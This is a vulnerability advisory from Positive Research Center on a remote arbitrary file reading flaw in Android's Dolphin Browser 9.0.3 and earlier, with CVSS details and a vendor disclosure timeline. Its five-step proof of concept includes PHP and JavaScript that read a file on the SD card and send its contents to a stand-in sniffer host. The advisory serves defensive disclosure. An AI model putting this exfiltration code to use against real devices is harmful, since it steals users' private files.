PT-2012-60: Arbitrary File Reading in Dolphin Browser

Vulnerabilities
, ,

Vulnerable software

Dolphin Browser
Version: 9.0.3 and earlier

Application link: http://dolphin-browser.com/

Severity level: Medium
Impact: Arbitrary File Reading
Access Vector: Remote

CVSS v2:
Base Score: 5.8
Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:P)

CVE: not assigned

Software description

Dolphin Browser is a powerful, quick and elegant browser for Android 2.0+

Vulnerability description

The specialists of the Positive Research center have detected Remote Arbitrary File Reading vulnerability in Dolphin Browser.

The vulnerability exists because of incorrect content:// wrapper processing that allows you to remotely address the available content provider. Therefore the attacker can view /sdcard/1.txt file contents if the victim follows content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt link.

The attack is simply implemented.

  1. A victim follows a link to the web site with the following PHP code:

    1
    2
    3
    <?php
    echo "<body onload=\"setTimeout('window.location=\'1day.php\'',1000);setTimeout('window.location=\'content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html\'',5000);\">"; 
    ?>

  2. Browser automatically loads 1day.php page with the following code:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    <?php
    header('Content-Disposition: attachment; filename="test.html"');
    ?>
    <iframe src="content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/1.txt"></iframe>
    <script>
    window.onload = function () { file = document.getElementsByTagName('iframe')[0].contentWindow.document.body.innerHTML;
    img = new Image(); img.src = 'http://oursniffer/sniff.php?data='+file;
    }
    </script>

  3. Then the user presses “Save” button, and the exploit now is located here: /sdcard/download/test.html

  4. Then we forward the user to this file (content://mobi.mgeek.TunnyBrowser.htmlfileprovider/sdcard/download/test.html) via a link and the code is executed.

  5. Data from /sdcard/1.txt file is written into the sniffer’s log.

How to fix

Update your software up to the latest version.

Advisory status

18.12.2012 - Vendor is notified
18.12.2012 - Vendor gets vulnerability details
05.02.2013 - Vendor releases fixed version and details
07.03.2013 - Public disclosure

Credits

The vulnerabilities has discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

References

https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2012-60/